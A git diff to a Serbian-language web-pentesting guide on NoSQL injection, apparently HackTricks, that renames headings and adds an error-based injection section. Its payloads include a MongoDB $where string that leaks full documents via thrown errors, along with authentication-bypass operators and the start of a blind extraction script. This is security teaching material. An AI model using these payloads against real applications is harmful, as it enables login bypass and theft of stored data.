diff --git a/src/pentesting-web/nosql-injection.md b/src/pentesting-web/nosql-injection.md
index 3330b7f13..1806ea329 100644
--- a/src/pentesting-web/nosql-injection.md
+++ b/src/pentesting-web/nosql-injection.md
@@ -84,7 +84,7 @@ Korišćenjem **$func** operatora iz [MongoLite](https://github.com/agentejo/coc
 ```
 ![https://swarm.ptsecurity.com/wp-content/uploads/2021/04/cockpit_auth_check_10.png](<../images/image (933).png>)
 
-### Dobijanje informacija iz različite kolekcije
+### Dobijanje informacija iz različitih kolekcija
 
 Moguće je koristiti [**$lookup**](https://www.mongodb.com/docs/manual/reference/operator/aggregation/lookup/) da se dobiju informacije iz različite kolekcije. U sledećem primeru, čitamo iz **različite kolekcije** pod nazivom **`users`** i dobijamo **rezultate svih unosa** sa lozinkom koja odgovara wildcard-u.
 
@@ -108,6 +108,12 @@ Moguće je koristiti [**$lookup**](https://www.mongodb.com/docs/manual/reference
 }
 ]
 ```
+### Error-Based Injection
+
+Umetnite `throw new Error(JSON.stringify(this))` u `$where` klauzulu da biste eksfiltrirali pune dokumente putem grešaka u JavaScript-u na serverskoj strani (zahteva da aplikacija otkrije greške u bazi podataka). Primer:
+```json
+{ "$where": "this.username='bob' && this.password=='pwd'; throw new Error(JSON.stringify(this));" }
+```
 ## MongoDB Payloads
 
 Lista [odavde](https://github.com/cr0hn/nosqlinjection_wordlists/blob/master/mongodb_nosqli.txt)
@@ -140,7 +146,7 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
 {"username": {"$gt":""}, "password": {"$gt":""}}
 {"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
 ```
-## Slepi NoSQL Skript
+## Blind NoSQL Script
 ```python
 import requests, string
 
@@ -229,5 +235,6 @@ get_password(u)
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection)
 - [https://nullsweep.com/a-nosql-injection-primer-with-mongo/](https://nullsweep.com/a-nosql-injection-primer-with-mongo/)
 - [https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb](https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb)
+- [https://sensepost.com/blog/2025/nosql-error-based-injection/](https://sensepost.com/blog/2025/nosql-error-based-injection/)
 
 {{#include ../banners/hacktricks-training.md}}